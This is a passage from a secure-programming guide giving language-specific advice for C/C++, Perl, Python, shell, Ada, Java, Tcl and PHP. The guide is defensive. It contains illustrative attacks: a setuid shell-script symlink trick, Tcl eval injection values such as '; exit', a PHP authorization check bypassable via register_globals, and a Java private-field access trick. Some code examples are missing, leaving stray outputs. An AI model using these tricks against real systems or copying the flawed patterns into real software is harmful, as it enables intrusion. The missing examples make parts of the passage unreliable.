those systems which attempt to protect themselves are truly unsubvertable. Although I haven’t seen
anything written on the subject, I suspect that using the incorrect call in C++ (e.g., mixing new and
malloc()) could have similar effects. For example, on March 11, 2002, it was announced that the zlib
library had this problem, affecting the many programs that use it. Thus, when testing programs on
GNU/Linux, you should set the environment variable MALLOC_CHECK_ to 1 or 2, and you might
consider executing your program with that environment variable set to each of 0, 1, and 2. The reason for this
variable is explained in the GNU/Linux malloc(3) man page:
Recent versions of Linux libc (later than 5.4.23) and GNU libc (2.x) include a malloc implementation which is
tunable via environment variables. When MALLOC_CHECK_ is set, a special (less efficient) implementation
is used which is designed to be tolerant against simple errors, such as double calls of free() with the same
argument, or overruns of a single byte (off-by-one bugs). Not all such errors can be protected against, however,
and memory leaks can result. If MALLOC_CHECK_ is set to 0, any detected heap corruption is silently
ignored; if set to 1, a diagnostic is printed on stderr; if set to 2, abort() is called immediately. This can be useful
because otherwise a crash may happen much later, and the true cause for the problem is then very hard to track
down.
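For example, during testing you might run your program under each setting in turn (a sketch; ./myprogram is just a placeholder name):
MALLOC_CHECK_=0 ./myprogram   # detected heap corruption is silently ignored
MALLOC_CHECK_=1 ./myprogram   # a diagnostic is printed on stderr
MALLOC_CHECK_=2 ./myprogram   # abort() is called immediately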
There are various tools to deal with this, such as Electric Fence and Valgrind; see Section 11.7 for more
information. If memory that is no longer needed is not freed (e.g., by calling free()), that unused memory may
accumulate - and if enough unused memory accumulates, the program may stop working. As a result, such
memory leaks may be exploitable by attackers to create a denial of service.
attackers to cause memory to be fragmented and cause a denial of service, but usually this is a fairly
impractical and low-risk attack.
Be as strict as you reasonably can when you declare types. Where you can, use “enum” to define
enumerated values (and not just a “char” or “int” with special values). This is particularly useful for
values in switch statements, where the compiler can be used to determine if all legal values have been
covered. Where it’s appropriate, use “unsigned” types if the value can’t be negative.
One complication in C and C++ is that the character type “char” can be signed or unsigned, depending
on the compiler and machine; the C standard permits either. When a signed char with its high bit set is
saved in an integer, the result will be a negative number; in some cases this can be exploitable. In
general, use “unsigned char” instead of char or signed char for buffers, pointers, and casts when dealing
with character data that may have values greater than 127 (0x7f). And when compiling, try to invoke a
compiler option that forces unspecified "char"s to be unsigned. Portable programs shouldn’t depend on
whether a char is signed or not, and by forcing it to be unsigned, the resulting executable can avoid a few
nasty security vulnerabilities. In gcc, you can make this happen using the "-funsigned-char" option.
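As a small illustration of the pitfall (a sketch, not taken from the book’s original examples), consider what happens when a byte value above 127 is widened to an int:
#include <stdio.h>
int main(void) {
    char c = (char) 0xE9;   /* 0xE9 is 'e' with an acute accent in ISO-8859-1 */
    unsigned char u = 0xE9;
    /* If plain char is signed (common on x86), c widens to the negative int -23,
       so using it as an array index or comparing it against 127 misbehaves. */
    printf("plain char: %d   unsigned char: %d\n", (int) c, (int) u);
    return 0;
}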
C and C++ are by definition rather lax in their type-checking support, but you can at least increase their
level of checking so that some mistakes can be detected automatically. Turn on as many compiler
warnings as you can and change the code to cleanly compile with them, and strictly use ANSI prototypes
in separate header (.h) files to ensure that all function calls use the correct types. For C or C++
compilations using gcc, use at least the following as compilation flags (which turn on a host of warning
messages) and try to eliminate all warnings (note that -O2 is used since some warnings can only be
detected by the data flow analysis performed at higher optimization levels):
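# An illustrative invocation along these lines (the exact flag list is an
# assumption, not necessarily the author's original list; myprogram.c is a placeholder):
gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2 -c myprogram.c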
Doc Shankar (of IBM) recommends a further set of gcc compiler options; it may take
some effort to make existing programs conform to all these checks, but these checks can also help find a
number of problems.
You might want “-W -pedantic” too. Remember to add the "-funsigned-char" option to this set.
Many C/C++ compilers can detect inaccurate format strings. For example, gcc can warn about inaccurate
format strings for functions you create if you use its __attribute__() facility (a C extension) to mark such
functions, and you can use that facility without making your code non-portable. Here is an example of
what you’d put in your header (.h) file:
/* in header.h */
#ifndef __GNUC__
# define __attribute__(x) /*nothing*/
#endif
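For instance, a printf-style function of your own could then be declared with the attribute roughly as follows (the function name log_msg is only an illustration):
/* still in header.h */
extern void log_msg(const char *fmt, ...)
    __attribute__((format(printf, 1, 2)));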
The "format" attribute takes either "printf" or "scanf", and the numbers that follow are the parameter
number of the format string and the first variadic parameter (respectively). The GNU docs talk about this
well. Note that there are other __attribute__ facilities as well, such as "noreturn" and "const".
Avoid common errors made by C/C++ developers. Using warning systems and style checkers can help
avoid common errors. For example, be careful about not using “=” when you mean “==”. The gcc
compiler’s -Wall option, recommended above, turns on the -Wparentheses option. This option warns you
when you use "=" in a context where "==" was probably intended, and it expects extra parentheses around
the assignment if you really do mean to use "=".
Some organizations have defined a subset of a well-known language to try to make common mistakes in
it either impossible or more obvious. One better-known subset of C is the MISRA C guidelines [MISRA
1998]. If you intend to use a subset, it’s wise to use automated tools to check if you’ve actually used only
a subset. There’s a proprietary tool called Safer C that checks code to see if it meets most of the MISRA
C requirements (it’s not quite 100%, because some MISRA C requirements are difficult to check
automatically).
Other approaches include building many more safety checks into the language, or changing the language
itself into a variant dialect that is hopefully easier to write secure programs in. Here are two examples, though I
have not had any experience using them. The Safe C Compiler (SCC) is a C-to-C compiler that adds extended pointer and
array access semantics to automatically detect memory access errors. Its front page and talk provide
interesting information, but its distribution appears limited as of 2004. Cyclone is a variant of C with far
more "compile-time, link-time, and run-time checks designed to ensure safety" (where they define safe
as free of crashes, buffer overflows, format string attacks, and some other problems). At this point you’re
really starting to use a different (though similar) language, and you should carefully decide on a language
before its use.
10.2. Perl
Perl programmers should first read the man page perlsec(1), which describes a number of issues involved
with writing secure programs in Perl. In particular, perlsec(1) describes the “taint” mode, which most
secure Perl programs should use. Taint mode is automatically enabled if the real and effective user or
group IDs differ, or you can use the -T command line flag (use the latter if you’re running on behalf of
someone else, e.g., a CGI script). Taint mode turns on various checks, such as checking path directories
to make sure they aren’t writable by others.
The most obvious effect of taint mode, however, is that you may not use data derived from outside your
program to affect something else outside your program by accident. In taint mode, all externally-obtained
input is marked as “tainted”, including command line arguments, environment variables, locale
information (see perllocale(1)), results of certain system calls (readdir, readlink, the gecos field of
getpw* calls), and all file input. Tainted data may not be used directly or indirectly in any command that
invokes a sub-shell, nor in any command that modifies files, directories, or processes. There is one
important exception: If you pass a list of arguments to either system or exec, the elements of that list are
NOT checked for taintedness, so be especially careful with system or exec while in taint mode.
Any data value derived from tainted data becomes tainted also. There is one exception to this; the way to
untaint data is to extract a substring of the tainted data. Don’t just use “.*” blindly as your substring,
though, since this would defeat the tainting mechanism’s protections. Instead, identify patterns that
identify the “safe” pattern allowed by your program, and use them to extract “good” values. After
extracting the value, you may still need to check it (in particular for its length).
The open, glob, and backtick functions call the shell to expand filename wild card characters; this can be
used to open security holes. You can try to avoid these functions entirely, or use them in a less-privileged
“sandbox” as described in perlsec(1). In particular, backticks should be rewritten using the system() call
(or even better, changed entirely to something safer).
The perl open() function comes with, frankly, “way too much magic” for most secure programs; it
interprets text that, if not carefully filtered, can create lots of security problems. Before writing code to
open or lock a file, consult the perlopentut(1) man page. In most cases, sysopen() provides a safer
(though more convoluted) approach to opening a file. The new Perl 5.6 adds an open() call with 3
parameters to turn off the magic behavior without requiring the convolutions of sysopen().
Perl programs should turn on the warning flag (-w), which warns of potentially dangerous or obsolete
statements.
You can also run Perl programs in a restricted environment. For more information see the “Safe” module
in the standard Perl distribution. I’m uncertain of the amount of auditing that this has undergone, so
beware of depending on this for security. You might also investigate the “Penguin Model for Secure
Distributed Internet Scripting”, though at the time of this writing the code and documentation seems to
be unavailable.
Many installations include a setuid root version of perl named “suidperl”. However, the perldelta man
page version 5.6.1 recommends using sudo instead, stating the following:
"Note that suidperl is neither built nor installed by default in any recent version of perl. Use of suidperl is highly
discouraged. If you think you need it, try alternatives such as sudo first. See http://www.courtesan.com/sudo/".
10.3. Python
As with any language, beware of any functions which allow data to be executed as part of a program, and
make sure an untrusted user can’t affect their input. This includes exec(), eval(), and execfile() (and
frankly, you should check carefully any call to compile()). The input() statement is also surprisingly
dangerous. [Watters 1996, 150].
Python programs with privileges that can be invoked by unprivileged users (e.g., setuid/setgid programs)
must not import the “user” module. The user module causes the pythonrc.py file to be read and executed.
Since this file would be under the control of an untrusted user, importing the user module allows an
attacker to force the trusted program to run arbitrary code.
Python does very little compile-time checking -- it has essentially no compile-time type information, for
example. This is unfortunate, resulting in a lot of latent bugs (both John Viega and I have experienced
this problem). Hopefully someday Python will implement optional static typing and type-checking, an
idea that’s been discussed for some time. A partial solution for now is PyChecker, a lint-like program
that checks for common bugs in Python source code. You can get PyChecker from
http://pychecker.sourceforge.net
Before Python version 2.3, Python included support for “Restricted Execution” through its RExec and
Bastion classes. The RExec class was primarily intended for executing applets and mobile code, but it
could also be used to try to limit privilege in a program even when the code has not been provided
externally. The Bastion module was intended to support restricted access to another object. For more
information, see Kuchling [2000]. Earlier versions of this book identified these functions but noted them
as "programmer beware", and I was right to be concerned. More recent analysis has found that RExec
and Bastion are fundamentally flawed, and have unfixable exploitable security flaws. Thus, these classes
have been removed from Python 2.3, and should not be used to enforce security in any version of Python.
There is ongoing work to develop alternative approaches to running untrusted Python code, such as the
experimental Sandbox.py module. Do not use this experimental Sandbox.py module for serious purposes
yet.
Supporting secure execution of untrusted code in Python turns out to be a rather difficult problem. For
example, allowing a user to unrestrictedly add attributes to a class permits all sorts of ways to subvert the
environment because Python’s implementation calls many “hidden” methods. By default, most Python
objects are passed by reference; if you insert a reference to a mutable value into a restricted program’s
environment, the restricted program can change the object in a way that’s visible outside the restricted
environment. Thus, if you want to give access to a mutable value, in many cases you should copy the
mutable value. Fundamentally, Python is designed to be a clean and highly reflective language, which is
good for a general-purpose language but makes handling malicious code more difficult.
Python supports operations called "pickling" and "unpickling" to conveniently store and retrieve sets of
objects. NEVER unpickle data from an untrusted source. Python 2.2 did a half-hearted job of trying to
support unpickling from untrusted sources (the __safe_for_unpickling__ attribute), but it was never
audited and probably never really worked. Python 2.3 has removed all of this, and made explicitly clear
that unpickling is not a safe operation. For more information, see PEP 307.
10.4. Shell Scripting Languages
% ln -s /usr/bin/setuid-shell /tmp/-x
% cd /tmp
% -x
Some systems may have closed this hole, but the point still stands: most command shells aren’t intended
for writing secure setuid/setgid programs. For programming purposes, avoid creating setuid shell scripts,
even on those systems that permit them. Instead, write a small program in another language to clean up
the environment, then have it call other executables (some of which might be shell scripts).
If you still insist on using shell scripting languages, at least put the script in a directory where it cannot
be moved or changed. Set PATH and IFS to known values very early in your script; indeed, the
environment should be cleaned before the script is called. Also, very early on, “cd” to a safe directory.
Use data only from directories that are controlled by trusted users, e.g., /etc, so that attackers can’t insert
maliciously-named files into those directories. Be sure to quote every filename passed on a command
line, e.g., use "$1" not $1, because filenames with whitespace will be split. Call commands using "--" to
disable additional options where you can, because attackers may create or pass filenames beginning with a
dash in the hope of tricking the program into processing them as options. Be especially careful of
filenames embedding other characters (e.g., newlines and other control characters). Examine input
filenames especially carefully and be very restrictive on what filenames are permitted.
If you don’t mind limiting your program to only work with GNU tools (or if you detect and optionally
use the GNU tools instead when they are available), you might want to use NIL characters as the
filename terminator instead of newlines. By using NIL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with embedded newlines) is much simpler. Several GNU tools that
output or input filenames can use this format instead of the more common “one filename per line”
format. Unfortunately, the name of this option isn’t consistent between tools; for many tools the name of
this option is “--null” or “-0”. GNU programs xargs and cpio allow using either --null or -0, tar uses
--null, find uses -print0, grep uses either --null or -Z, and sort uses either -z or --zero-terminated. Those
who find this inconsistency particularly disturbing are invited to supply patches to the GNU authors; I
would suggest making sure every program supported “--null” since that seems to be the most common
option name. For example, here’s one way to move files to a target directory, even if there may be a vast
number of files and some may have awkward names with embedded newlines (thanks to Jim Dennis for
reminding me of this):
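# A sketch of one such approach using GNU tools ($target_dir is a placeholder):
find . -maxdepth 1 -type f -print0 | xargs --null mv --target-directory="$target_dir"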
In a similar vein, I recommend not trusting “restricted shells” to implement secure policies. Restricted
shells are shells that intentionally prevent users from performing a large set of activities - their goal is to
force users to only run a small set of programs. A restricted shell can be useful as a defense-in-depth
measure, but restricted shells are notoriously hard to configure correctly and as configured are often
subvertable. For example, some restricted shells will start by running some file in an unrestricted mode
(e.g., “.profile”) - if a user can change this file, they can force execution of that code. A restricted shell
should be set up to only run a few programs, but if any of those programs have “shell escapes” to let
users run more programs, attackers can use those shell escapes to escape the restricted shell. Even if the
programs don’t have shell escapes, it’s quite likely that the various programs can be used together (along
with the shell’s capabilities) to escape the restrictions. Of course, if you don’t set the PATH of a restricted
shell (and allow any program to run), then an attacker can use the shell escapes of many programs
(including text editors, mailers, etc.). The problem is that the purpose of a shell is to run other programs,
but those other programs may allow unintended operations -- and the shell doesn’t interpose itself to
prevent these operations.
10.5. Ada
In Ada95, the Unbounded_String type is often more flexible than the String type because it is
automatically resized as necessary. However, don’t store especially sensitive secret values such as
passwords or secret keys in an Unbounded_String, since core dumps and page areas might still hold them
later. Instead, use the String type for this data, lock it into memory while it’s used, and overwrite the data
as soon as possible with some constant value such as (others => ’ ’). Use the Ada pragma
Inspection_Point on the object holding the secret after erasing the memory. That way, you can be certain
that the object containing the secret will really be erased (and that the overwriting won’t be optimized
away).
Like many other languages, Ada’s string types (including String and Unbounded_String) can hold ASCII
0. If that’s then passed to a C library (including a kernel), that can be interpreted very differently by the
library than the caller intended.
It’s common for beginning Ada programmers to believe that the String type’s first index value is always
1, but this isn’t true if the string is sliced. Avoid this error.
It’s worth noting that SPARK is a “high-integrity subset of the Ada programming language”; SPARK
users use a tool called the “SPARK Examiner” to check conformance to SPARK rules, including flow
analysis, and there are various supports for full formal proof of the code if desired. See the SPARK
website for more information. To my knowledge, there are no OSS/FS SPARK tools. If you’re storing
passwords and private keys you should still lock them into memory if appropriate and overwrite them as
soon as possible. Note that SPARK is often used in environments where paging does not occur.
10.6. Java
If you’re developing secure programs using Java, frankly your first step (after learning Java) is to read the
two primary texts for Java security, namely Gong [1999] and McGraw [1999] (for the latter, look
particularly at section 7.1). You should also look at Sun’s posted security code guidelines at
http://java.sun.com/security/seccodeguide.html, and there’s a nice article by Sahu et al [2002]. A set of
slides describing Java’s security model is freely available at http://www.dwheeler.com/javasec. You can
also see McGraw [1998].
Obviously, a great deal depends on the kind of application you’re developing. Java code intended for use
on the client side has a completely different environment (and trust model) than code on a server side.
The general principles apply, of course; for example, you must check and filter any input from an
untrusted source. However, in Java there are some “hidden” inputs or potential inputs that you need to be
wary of, as discussed below. Johnathan Nightingale [2000] made an interesting statement summarizing
many of the issues in Java programming:
... the big thing with Java programming is minding your inheritances. If you inherit methods from parents,
interfaces, or parents’ interfaces, you risk opening doors to your code.
The following are a few key guidelines, based on Gong [1999], McGraw [1999], Sun’s guidance, and my
own experience:
1. Do not use public fields or variables; declare them as private and provide accessors to them so you
can limit their accessibility.
2. Make methods private unless there is a good reason to do otherwise (and if you do otherwise,
document why). These non-private methods must protect themselves, because they may receive
tainted data (unless you’ve somehow arranged to protect them).
3. The JVM may not actually enforce the accessibility modifiers (e.g., “private”) at run-time in an
application (as opposed to an applet). My thanks to John Steven (Cigital Inc.), who pointed this out
on the “Secure Programming” mailing list on November 7, 2000. The issue is that it all depends on
what class loader the class requesting the access was loaded with. If the class was loaded with a
trusted class loader (including the null/primordial class loader), the access check returns "TRUE"
(allowing access). For example, this works (at least with Sun’s 1.2.2 VM; it might not work with
other implementations):
a. write a victim class (V) with a public field, compile it.
b. write an “attack” class (A) that accesses that field, compile it
c. change V’s public field to private, recompile
d. run A - it’ll access V’s (now private) field.
However, the situation is different with applets. If you convert A to an applet and run it as an applet
(e.g., with appletviewer or browser), its class loader is no longer a trusted (or null) class loader.
Thus, the code will throw java.lang.IllegalAccessError, with the message that you’re trying to access
a field V.secret from class A.
4. Avoid using static field variables. Such variables are attached to the class (not class instances), and
classes can be located by any other class. As a result, static field variables can be found by any other
class, making them much more difficult to secure.
5. Never return a mutable object to potentially malicious code (since the code may decide to change it).
Note that arrays are mutable (even if the array contents aren’t), so don’t return a reference to an
internal array with sensitive data.
6. Never store user-given mutable objects (including arrays of objects) directly. Otherwise, the user
could hand the object to the secure code, let the secure code “check” the object, and change the data
while the secure code was trying to use the data. Clone arrays before saving them internally, and be
careful here (e.g., beware of user-written cloning routines).
7. Don’t depend on initialization. There are several ways to allocate uninitialized objects.
8. Make everything final, unless there’s a good reason not to. If a class or method is non-final, an
attacker could try to extend it in a dangerous and unforeseen way. Note that this causes a loss of
extensibility, in exchange for security.
9. Don’t depend on package scope for security. A few classes, such as java.lang, are closed by default,
and some Java Virtual Machines (JVMs) let you close off other packages. Otherwise, Java classes
are not closed. Thus, an attacker could introduce a new class inside your package, and use this new
class to access the things you thought you were protecting.
10. Don’t use inner classes. When inner classes are translated into byte codes, the inner class is
translated into a class accessible to any class in the package. Even worse, the enclosing class’s private
fields silently become non-private to permit access by the inner class!
11. Minimize privileges. Where possible, don’t require any special permissions at all. McGraw goes
further and recommends not signing any code; I say go ahead and sign the code (so users can decide
to “run only signed code by this list of senders”), but try to write the program so that it needs
nothing more than the sandbox set of privileges. If you must have more privileges, audit that code
especially hard.
12. If you must sign your code, put it all in one archive file. Here it’s best to quote McGraw [1999]:
The goal of this rule is to prevent an attacker from carrying out a mix-and-match attack in which the
attacker constructs a new applet or library that links some of your signed classes together with malicious
classes, or links together signed classes that you never meant to be used together. By signing a group of
classes together, you make this attack more difficult. Existing code-signing systems do an inadequate job
of preventing mix-and-match attacks, so this rule cannot prevent such attacks completely. But using a
single archive can’t hurt.
13. Make your classes uncloneable. Java’s object-cloning mechanism allows an attacker to instantiate a
class without running any of its constructors. To make your class uncloneable, just define the
following method in each of your classes:
public final Object clone() throws java.lang.CloneNotSupportedException {
throw new java.lang.CloneNotSupportedException();
}
If you really need to make your class cloneable, then there are some protective measures you can
take to prevent attackers from redefining your clone method. If you’re defining your own clone
method, just make it final. If you’re not, you can at least prevent the clone method from being
maliciously overridden by adding the following:
public final Object clone() throws java.lang.CloneNotSupportedException {
    return super.clone();
}
14. Make your classes unserializeable. Serialization allows attackers to view the internal state of your
objects, even private portions. To prevent this, add this method to your classes:
private final void writeObject(ObjectOutputStream out)
throws java.io.IOException {
throw new java.io.IOException("Object cannot be serialized");
}
Even in cases where serialization is okay, be sure to use the transient keyword for the fields that
contain direct handles to system resources and that contain information relative to an address space.
Otherwise, deserializing the class may permit improper access. You may also want to identify
sensitive information as transient.
If you define your own serializing method for a class, it should not pass an internal array to any
DataInput/DataOuput method that takes an array. The rationale: All DataInput/DataOutput methods
can be overridden. If a Serializable class passes a private array directly to a DataOutput(write(byte []
b)) method, then an attacker could subclass ObjectOutputStream and override the write(byte [] b)
method to enable him to access and modify the private array. Note that the default serialization does
not expose private byte array fields to DataInput/DataOutput byte array methods.
15. Make your classes undeserializeable. Even if your class is not serializeable, it may still be
deserializeable. An attacker can create a sequence of bytes that happens to deserialize to an instance
of your class with values of the attacker’s choosing. In other words, deserialization is a kind of
public constructor, allowing an attacker to choose the object’s state - clearly a dangerous operation!
To prevent this, add this method to your classes:
private final void readObject(ObjectInputStream in)
throws java.io.IOException {
throw new java.io.IOException("Class cannot be deserialized");
}
16. Don’t compare classes by name. After all, attackers can define classes with identical names, and if
you’re not careful you can cause confusion by granting these classes undesirable privileges. Thus,
here’s an example of the wrong way to determine if an object has a given class:
if (obj.getClass().getName().equals("Foo")) {
If you need to determine if two objects have exactly the same class, instead use getClass() on both
sides and compare using the == operator. Thus, you should use this form:
if (a.getClass() == b.getClass()) {
If you truly need to determine if an object has a given classname, you need to be pedantic and be
sure to use the current namespace (of the current class’s ClassLoader). Thus, you’ll need to use this
format:
if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
This guideline is from McGraw and Felten, and it’s a good guideline. I’ll add that, where possible,
it’s often a good idea to avoid comparing class values anyway. It’s often better to try to design class
methods and interfaces so you don’t need to do this at all. However, this isn’t always practical, so it’s
important to know these tricks.
17. Don’t store secrets (cryptographic keys, passwords, or algorithms) in the code or data. Hostile JVMs
can quickly view this data. Code obfuscation doesn’t really hide the code from serious attackers.
10.7. Tcl
Tcl stands for “tool command language” and is pronounced “tickle.” Tcl is divided into two parts: a
language and a library. The language is a simple language, originally intended for issuing commands to
interactive programs and including basic programming capabilities. The library can be embedded in
application programs. You can find more information about Tcl at sites such as the Tcl.tk and the Tcl
WWW Info web page and the comp.lang.tcl FAQ launch page at http://www.tclfaq.wservice.com/tcl-faq.
My thanks go to Wojciech Kocjan for providing some of this detailed information on using Tcl in secure
applications.
For some security applications, especially interesting components of Tcl are Safe-Tcl (which creates a
sandbox in Tcl) and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as well as the
WebWiseTclTk Toolkit which permits Tcl packages to be automatically located and loaded from
anywhere on the World Wide Web. You can find more about the latter from
http://www.cbl.ncsu.edu/software/WebWiseTclTk. It’s not clear to me how much code review this has
received.
Tcl’s original design goal to be a small, simple language resulted in a language that was originally
somewhat limiting and slow. For an example of the limiting weaknesses in the original language, see
Richard Stallman’s “Why You Should Not Use Tcl”. For example, Tcl was originally designed to really
support only one data type (string). Thankfully, these issues have been addressed over time. In particular,
version 8.0 added support for more data types (integers are stored internally as integers, lists as lists and
so on). This improves its capabilities, and in particular improves its speed.
As with essentially all scripting languages, Tcl has an "eval" command that parses and executes arbitrary
Tcl commands. And like all such scripting languages, this eval command needs to be used especially
carefully, or an attacker could insert characters in the input to cause malicious things to occur. For
example, an attacker may be able to insert characters with special meaning to Tcl such as embedded
whitespace (including space and newline), double-quote, curly braces, square brackets, dollar signs,
backslash, semicolon, or pound sign (or create input to cause these characters to be created during
processing). This also applies to any function that passes data to eval (depending on how eval is
called).
Here is a small example that may make this concept clearer; first, let’s define a small function and then
interactively invoke it directly - note that these uses are fine:
proc something {a b c d e} {
puts "A=’$a’"
puts "B=’$b’"
puts "C=’$c’"
puts "D=’$d’"
puts "E=’$e’"
}
However, continuing the example, let’s see how "eval" can be incorrectly and correctly called. If you call
eval in an incorrect (dangerous) way, it allows attackers to misuse it. However, by using commands like
list or lrange to correctly group the input, you can avoid this problem:
B=’t2’
C=’t3’
D=’t4’
E=’t5’
Using lrange is useful when concatenating arguments to a called function, e.g., with more complex
libraries using callbacks. In Tcl, eval is often used to create a one-argument version of a function that
takes a variable number of arguments, and you need to be careful when using it this way. Here’s another
example (presuming that you’ve defined a "printf" function):
Fundamentally, when passing a command that will eventually be evaluated, you must pass Tcl
commands as a properly built list, and not as a (possibly concatenated) string. For example, the "after"
command runs a Tcl command after a given number of milliseconds; if the data in $param1 can be
controlled by an attacker, this Tcl code is dangerously wrong:
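# A sketch of the dangerous pattern (the command name processData and the delay
# are illustrative): $param1 is spliced into a string that will later be
# re-parsed and evaluated as Tcl code.
after 1000 "processData $param1"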
This is wrong, because if an attacker can control the value of $param1, the attacker can control the
program. For example, if the attacker can cause $param1 to have “[exit]”, then the program will exit.
Also, if $param1 would be “; exit”, it would also exit.
Thus, the proper alternative would be:
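# Sketch of the safer form: build the deferred command as a proper Tcl list,
# so $param1 is passed as a single word and never re-parsed as code.
after 1000 [list processData $param1]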
Here’s another example showing what you shouldn’t do, pretending that $params is data controlled by
possibly malicious user:
’TESTSTRING ’
But if the untrusted user sends data with an embedded newline, like this:
The result will be this (notice that the attacker’s code was executed!):
HELLOWORLD
’TESTINGSTRING ’
Wojciech Kocjan suggests that the simplest solution in this case is to convert this to a list using lrange,
doing this:
’TESTINGSTRING ’
Note that this solution presumes that the potentially malicious text is concatenated to the end of the text;
as with all languages, make sure the attacker cannot control the format text.
As a matter of style, always use curly braces when using if, while, for, expr, and any other command
which parses an argument using expr/eval/subst. Doing this will avoid a common Tcl error called
unintended double substitution. This is best explained by example; the
following code is incorrect:
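# A sketch of the mistake (names illustrative): the condition is not brace-quoted,
# so [eof $file] is substituted once, before while runs, and the resulting
# constant condition is never re-evaluated.
while ![eof $file] {
    set line [gets $file]
    puts $line
}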
The code is incorrect because the "![eof $file]" text will be evaluated by the Tcl parser when the while
command is executed the first time, and not re-evaluated in every iteration as it should be. Instead, do
this:
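# Sketch of the corrected loop: both the condition and the body are brace-quoted,
# so the condition is re-evaluated on every iteration.
while {![eof $file]} {
    set line [gets $file]
    puts $line
}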
Note that both the condition and the action to be performed are surrounded by curly braces. Although
there are cases where the braces are redundant, they never hurt, and when you fail to include the curly
braces where they’re needed (say, when making a minor change) subtle and hard-to-find errors often
result.
More information on good Tcl style can be found in documents such as Ray Johnson’s Tcl Style Guide.
In the past, I have stated that I don’t recommend Tcl for writing programs which must mediate a security
boundary. Tcl seems to have improved since that time, so while I cannot guarantee Tcl will work for your
needs, I can’t guarantee that any other language will work for you either. Again, my thanks to Wojciech
Kocjan who provided some of these suggestions on how to write Tcl code for secure applications.
10.8. PHP
SecureReality has put out a very interesting paper titled “A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP” [Clowes 2001], which discusses some of the problems in writing secure
programs in PHP, particularly in versions before PHP 4.1.0. Clowes concludes that “it is very hard to
write a secure PHP application (in the default configuration of PHP), even if you try”.
Granted, there are security issues in any language, but one particular issue stands out in older versions of
PHP that arguably makes older PHP versions less secure than most languages: the way it loads data into
its namespace. By default, in PHP (versions 4.1.0 and lower) all environment variables and values sent to
PHP over the web are automatically loaded into the same namespace (global variables) that normal
variables are loaded into - so attackers can set arbitrary variables to arbitrary values, which keep their
values unless explicitly reset by a PHP program. In addition, PHP automatically creates variables with a
default value when they’re first requested, so it’s common for PHP programs to not initialize variables. If
you forget to set a variable, PHP can report it, but by default PHP won’t - and note that this is simply an
error report, it won’t stop an attacker who finds an unusual way to cause it. Thus, by default PHP allows
an attacker to completely control the values of all variables in a program unless the program takes special
care to override the attacker. Once the program takes over, it can reset these variables, but failing to reset
any variable (even one not obvious) might open a vulnerability in the PHP program.
For example, the following PHP program (an example from Clowes) intends to only let those who know
the password to get some important information, but an attacker can set “auth” in their web browser and
subvert the authorization check:
<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>
I and many others have complained about this particularly dangerous problem; it’s especially a problem
because PHP is widely used. A language that’s supposed to be easy to use had better make it easy to write
secure programs in, after all. It’s possible to disable this misfeature in PHP by turning the setting
“register_globals” to “off”, but PHP versions up through 4.1.0 set it to “on” by default, and PHP
before 4.1.0 is harder to use with register_globals off. The PHP developers warned in their PHP 4.1.0
announcement that “as of the next semi-major version of PHP, new installations of PHP will default to
having register_globals set to off.” This has now happened; as of PHP version 4.2.0, external variables
(from the environment, the HTTP request, cookies or the web server) are no longer registered in the
global scope by default. The preferred method of accessing these external variables is by using the new
Superglobal arrays, introduced in PHP 4.1.0.
PHP with “register_globals” set to “on” is a dangerous choice for nontrivial programs - it’s just too easy
to write insecure programs. However, once “register_globals” is set to “off”, PHP is quite a reasonable
language for development.
The secure default should include setting “register_globals” to “off”, and also including several functions
to make it much easier for users to specify and limit the input they’ll accept from external sources. Then
web servers (such as Apache) could separately configure this secure PHP installation. Routines could be
placed in the PHP library to make it easy for users to list the input variables they want to accept; some
functions could check the patterns these variables must have and/or the type that the variable must be
coerced to. In my opinion, PHP is a bad choice for secure web development if you set register_globals
on.
As I suggested in earlier versions of this book, PHP has been modified to become a reasonable choice for
secure web development. However, note that PHP doesn’t have a particularly good security vulnerability
track record (e.g., register_globals, a file upload problem, and a format string problem in the error
reporting library); I believe that security issues were not considered sufficiently in early editions of PHP;
I also think that the PHP developers are now emphasizing security and that these security issues are
finally getting worked out. One piece of evidence is the major change that the PHP developers have made to
turn off register_globals by default; this had a significant impact on PHP users, and their willingness to make this
change is a good sign. Unfortunately, it’s not yet clear how secure PHP really is; PHP just hasn’t had
much of a track record now that the developers of PHP are examining it seriously for security issues.
Hopefully this will become clear quickly.
If you’ve decided to use PHP, here are some of my recommendations (many of these recommendations
are based on ways to counter the issues that Clowes raises):
• Set the PHP configuration option “register_globals” off, and use PHP 4.2.0 or greater. PHP 4.1.0 adds
several special arrays, particularly $_REQUEST, which makes it far simpler to develop software in
PHP when “register_globals” is off. Setting register_globals off, which is the default in PHP 4.2.0,
completely eliminates the most common PHP attacks. If you’re assuming that register_globals is off,
you should check for this first (and halt if it’s not true) - that way, people who install your program
will quickly know there’s a problem. Note that many third-party PHP applications cannot work with
this setting, so it can be difficult to keep it off for an entire website. It’s possible to set register_globals
off for only some programs. For example, for Apache, you could insert these lines into the file
.htaccess in the PHP directory (or use Directory directives to control it further):
php_flag register_globals Off
php_flag track_vars On
However, the .htaccess file itself is ignored unless the Apache web server is configured to permit
overrides; often the Apache global configuration is set so that AllowOverride is set to None. So, for
Apache users, if you can convince your web hosting service to set “AllowOverride Options” in their
configuration file (often /etc/httpd/conf/httpd.conf) for your host, do that. Then write helper functions to
simplify loading the data you need (and only that data).
• If you must develop software where register_globals might be on while running (e.g., a
widely-deployed PHP application), always set values not provided by the user. Don’t depend on PHP
default values, and don’t trust any variable you haven’t explicitly set. Note that you have to do this for
every entry point (e.g., every PHP program or HTML file using PHP). The best approach is to begin
each PHP program by setting all variables you’ll be using, even if you’re simply resetting them to the
usual default values (like "" or 0). This includes global variables referenced in included files, even all
libraries, transitively. Unfortunately, this makes this recommendation hard to do, because few
developers truly know and understand all global variables that may be used by all functions they call.
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data - but
programmers often forget to check all sources, and this approach breaks down if PHP adds a new data source (e.g.,
HTTP_POST_FILES wasn't in old versions of PHP). Of course, this simply tells you how to make the
best of a bad situation; in case you haven’t noticed yet, turn off register_globals!
• Set the error reporting level to E_ALL, and resolve all errors reported by it during testing. Among
other things, this will complain about uninitialized variables, which are a key issue in PHP. This is a
good idea anyway whenever you start using PHP, because this helps debug programs, too. There are
many ways to set the error reporting level, including in the “php.ini” file (global), the “httpd.conf”
